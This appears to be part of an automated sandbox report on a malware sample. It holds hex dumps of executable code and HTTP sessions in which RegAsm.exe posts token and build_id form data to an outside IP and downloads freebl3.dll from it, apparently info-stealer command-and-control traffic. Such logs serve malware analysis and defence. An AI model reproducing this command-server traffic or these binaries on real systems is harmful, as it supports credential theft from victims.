                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                                                                                Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                                                                                Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                                                                                Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                                Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                                                                                Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                                                                                Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                                                                                Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                7192.168.2.44973737.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:08 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEH
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 4677
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:08 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------BFBFBFIIJDAKECAKKJEHContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------BFBFBFIIJDAKECAKKJEHCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                8192.168.2.44973837.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:09 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 1529
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:09 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------JJECGHJDBFIJJJKEHCBFCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:10 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                9192.168.2.44973937.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:10 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:10 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 46 49 44 47 49 45 47 44 47 44 48 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------GDAAKFIDGIEGDGDHIDAKContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------GDAAKFIDGIEGDGDHIDAKCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:11 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                10192.168.2.44974037.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:11 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:11 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 36 31 30 30 35 38 66 66 62 33 34 36 38 39 64 63 35 65 30 30 65 33 61 36 31 37 65 35 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 35 32 31 66 33 66 32 65 33 63 38 64 62 39 37 32 35 33 39 39 31 61 30 37 33 61 38 66 37 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"c9610058ffb34689dc5e00e3a617e50b------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="build_id"c1521f3f2e3c8db97253991a073a8f71------DBFCBGCGIJKJKECAKEGCCont
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:12 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                11192.168.2.44974137.27.87.1554437532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:13 UTC156OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                                                Host: 37.27.87.155
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 19 Apr 2024 15:08:14 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                                                                                                                                                                                                                                Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                                                                                                                                                                                                                                2024-04-19 15:08:14 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                                                                                                                                                                                                                                Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
